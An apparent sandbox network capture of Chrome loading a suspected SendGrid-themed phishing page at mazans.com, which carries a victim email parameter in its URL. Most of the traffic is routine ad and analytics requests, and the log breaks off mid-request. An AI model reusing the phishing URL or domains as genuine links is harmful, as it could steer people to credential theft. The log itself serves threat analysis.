                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC903INData Raw: 64 39 37 0d 0a 74 79 70 65 6f 66 20 5f 5f 63 74 63 67 5f 63 74 5f 37 32 39 36 37 5f 65 78 65 63 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 5f 5f 63 74 63 67 5f 63 74 5f 37 32 39 36 37 5f 65 78 65 63 28 7b 22 74 63 22 3a 22 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 61 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 35 30 65 66 38 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: d97typeof __ctcg_ct_72967_exec === 'function' && __ctcg_ct_72967_exec({"tc":"37dfbd8ee84e001269efc234ef448f9a9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a96
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC2358INData Raw: 31 61 33 30 38 37 62 62 36 30 66 34 31 64 38 32 38 32 63 37 33 34 61 32 39 61 36 32 65 64 38 30 32 62 63 61 63 32 62 31 62 65 37 37 39 39 61 36 66 35 34 65 33 65 33 33 63 35 66 38 35 39 35 36 64 63 62 31 30 61 34 63 31 35 66 37 61 30 65 33 33 39 66 39 32 35 38 38 66 36 34 65 62 63 62 38 33 63 62 38 36 65 63 33 36 34 63 62 30 37 61 33 35 36 38 65 66 63 32 65 64 62 30 38 37 39 62 35 65 38 63 62 33 31 36 65 37 62 33 39 35 63 37 34 31 39 35 36 30 35 66 34 66 33 39 30 37 65 38 35 35 33 63 34 31 39 31 37 31 36 37 37 62 63 63 64 31 62 63 64 39 32 30 61 31 31 65 63 61 34 63 64 65 63 65 65 31 66 39 65 62 34 62 31 61 32 63 32 38 31 66 62 65 33 34 31 35 64 32 31 65 39 35 62 39 34 66 34 30 35 37 63 38 39 32 38 36 34 31 62 64 37 36 30 35 64 36 64 36 66 65 61 36 36 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1a3087bb60f41d8282c734a29a62ed802bcac2b1be7799a6f54e3e33c5f85956dcb10a4c15f7a0e339f92588f64ebcb83cb86ec364cb07a3568efc2edb0879b5e8cb316e7b395c74195605f4f3907e8553c419171677bccd1bcd920a11eca4cdecee1f9eb4b1a2c281fbe3415d21e95b94f4057c8928641bd7605d6d6fea66a
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC230INData Raw: 33 65 31 33 39 37 31 31 61 30 65 63 65 30 62 34 32 62 39 64 61 62 64 34 64 35 33 38 32 36 38 37 30 64 33 39 37 38 34 34 31 64 35 63 36 65 35 38 63 30 61 36 30 61 38 33 61 62 62 31 62 37 38 30 66 39 61 31 62 33 31 37 35 64 34 63 63 31 36 31 30 63 38 63 34 65 39 64 65 65 33 62 32 31 33 61 63 22 7d 2c 22 22 2c 7b 22 72 65 71 22 3a 22 36 36 61 65 39 64 61 39 66 63 62 39 66 36 64 33 35 34 64 39 31 63 38 36 34 32 61 39 64 36 30 39 22 2c 22 67 61 63 22 3a 7b 22 74 22 3a 5b 22 47 2d 38 57 35 4c 52 34 34 32 4c 22 5d 2c 22 74 75 61 22 3a 5b 5d 2c 22 76 22 3a 31 2c 22 63 22 3a 22 32 42 33 75 77 75 72 6b 65 6b 71 77 75 22 2c 22 66 22 3a 66 61 6c 73 65 7d 7d 2c 22 22 29 3b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 3e139711a0ece0b42b9dabd4d53826870d3978441d5c6e58c0a60a83abb1b780f9a1b3175d4cc1610c8c4e9dee3b213ac"},"",{"req":"66ae9da9fcb9f6d354d91c8642a9d609","gac":{"t":["G-8W5LR442L"],"tua":[],"v":1,"c":"2B3uwurkekqwu","f":false}},"");0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          86192.168.2.1749885142.250.181.2264436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1351OUTGET /pagead/viewthroughconversion/923239173/?random=1731515353497&cv=11&fst=1731515353497&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: googleads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC842INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: test_cookie=CheckForPermission; expires=Wed, 13-Nov-2024 16:44:17 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC536INData Raw: 31 33 31 63 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 131c(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1378INData Raw: 6c 22 2c 74 3d 7b 7d 2c 76 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 2c 62 2c 64 29 7b 69 66 28 21 64 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 64 3d 76 5b 62 5d 3b 69 66 28 64 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 64 3d 61 5b 64 5d 3b 72 65 74 75 72 6e 20 64 21 3d 3d 76 6f 69 64 20 30 3f 64 3a 61 5b 62 5d 7d 7d 20 66 75 6e 63 74 69 6f 6e 20 78 28 61 2c 62 2c 64 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: l",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))br
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1378INData Raw: 65 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 62 72 61 6e 64 29 26 26 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 29 3a 21 31 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 52 28 61 29 7b 76 61 72 20 62 3b 61 3a 7b 69 66 28 62 3d 7a 2e 6e 61 76 69 67 61 74 6f 72 29 69 66 28 62 3d 62 2e 75 73 65 72 41 67 65 6e 74 29 62 72 65 61 6b 20 61 3b 62 3d 22 22 7d 72 65 74 75 72 6e 20 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e(function(b){return(b=b.brand)&&b.indexOf(a)!=-1}):!1:!1}function R(a){var b;a:{if(b=z.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R(
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1378INData Raw: 70 69 63 73 3d 6e 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 29 29 3b 74 72 79 7b 76 61 72 20 53 3d 43 2e 66 65 74 63 68 28 71 2c 49 29 3b 53 26 26 53 2e 63 61 74 63 68 28 42 29 3b 76 61 72 20 4a 3d 21 30 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 62 61 29 7b 7d 7d 69 66 28 6e 26 26 6e 2e 6e 6f 46 61 6c 6c 62 61 63 6b 29 4a 3d 21 31 3b 65 6c 73 65 7b 74 72 79 7b 76 61 72 20 63 61 3d 44 2e 73 65 6e 64 42 65 61 63 6f 6e 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 45 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: pics=n.browsingTopics));try{var S=C.fetch(q,I);S&&S.catch(B);var J=!0;break a}catch(ba){}}if(n&&n.noFallback)J=!1;else{try{var ca=D.sendBeacon&&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||E(q);J=!0}}J&&e()}}(f)));r.onload=e;r.sr
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC230INData Raw: 30 2e 30 2e 30 5c 78 32 36 75 61 77 5c 78 33 64 30 5c 78 32 36 66 6c 65 64 67 65 5c 78 33 64 31 5c 78 32 36 64 61 74 61 5c 78 33 64 61 64 73 5f 64 61 74 61 5f 72 65 64 61 63 74 69 6f 6e 25 33 44 66 61 6c 73 65 5c 78 32 36 72 66 6d 74 5c 78 33 64 33 5c 78 32 36 66 6d 74 5c 78 33 64 33 5c 78 32 36 69 73 5f 76 74 63 5c 78 33 64 31 5c 78 32 36 63 69 64 5c 78 33 64 43 41 51 53 47 77 43 61 37 4c 37 64 5f 46 6c 62 54 63 78 41 6b 41 33 57 59 69 69 6e 65 2d 6a 50 41 70 69 62 7a 2d 4f 34 58 67 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 34 31 32 34 32 32 35 39 31 39 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0.0.0\x26uaw\x3d0\x26fledge\x3d1\x26data\x3dads_data_redaction%3Dfalse\x26rfmt\x3d3\x26fmt\x3d3\x26is_vtc\x3d1\x26cid\x3dCAQSGwCa7L7d_FlbTcxAkA3WYiine-jPApibz-O4Xg\x26random\x3d4124225919\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          87192.168.2.1749906151.101.65.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC397OUTOPTIONS /reports HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: w3-reporting-nel.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://alb.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC644INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Server: Varnish
                                                                                                                                                                                                                                                                                                                                                                          Retry-After: 0
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://alb.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Content-Type,Origin,X-origination-host,X-origination-path
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          88192.168.2.1749909150.171.27.104436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC994OUTGET /action/0?ti=5202129&Ver=2&mid=23341f73-a829-452a-8715-848086e91659&bo=1&sid=6c20c730a1dc11ef92b555071f46574f&vid=6c2123d0a1dc11ef9ad55fff4e91da09&vids=1&msclkid=N&uach=pv%3D10.0.0&pi=918639831&lg=en-US&sw=1280&sh=1024&sc=24&tl=Page%20not%20found%20%7C%20SendGrid&p=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&r=https%3A%2F%2Fsepedatua.com%2F&lt=6000&evt=pageLoad&sv=1&cdb=ARoR&rn=686857 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC866INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=26F6E5F6C5F160753C37F0C0C4D461BA; domain=.bing.com; expires=Mon, 08-Dec-2025 16:29:17 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: MR=0; domain=bat.bing.com; expires=Wed, 20-Nov-2024 16:29:17 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: 6A5F40505E834AF28DD5EABB1294AA55 Ref B: DFW311000108019 Ref C: 2024-11-13T16:29:17Z
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          89192.168.2.174991099.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC405OUTGET /analytics-next/bundles/schemaFilter.bundle.5c2661f67b4b71a6d9bd.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1559
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Tue, 17 Sep 2024 01:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 16 Sep 2024 16:03:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "3867b2388b619ff7fddc29ef359fc9aa"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: u16VcQlfwBtHRZyWZ3J5lA.kF3ts0Fc8
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 8e04f5d6c745b231c10fce7c2aa9c70e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: -m6PLfstqJ_5HcrGvvCEFU6Md3CpLvoVDZRPf2Y0dxF4LFb7mbA2xw==
                                                                                                                                                                                                                                                                                                                                                                          Age: 4979771
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:18 UTC1559INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 65 67 6d 65 6e 74 5f 61 6e 61 6c 79 74 69 63 73 5f 6e 65 78 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 65 67 6d 65 6e 74 5f 61 6e 61 6c 79 74 69 63 73 5f 6e 65 78 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 39 33 5d 2c 7b 39 32 35 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 6e 2c 65 29 7b 76 61 72 20 74 2c 69 3b 72 65 74 75 72 6e 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 65 6e 61 62 6c 65 64 29 3f 65 2e 65 6e 61 62 6c 65 64 3a 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: "use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[493],{9254:function(n,e,t){function i(n,e){var t,i;return"boolean"==typeof(null==e?void 0:e.enabled)?e.enabled:null===(i=null===(t=null==n?void 0:n


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          90192.168.2.174991613.107.246.454436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC418OUTGET /tag/uet/5202129 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.clarity.ms
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
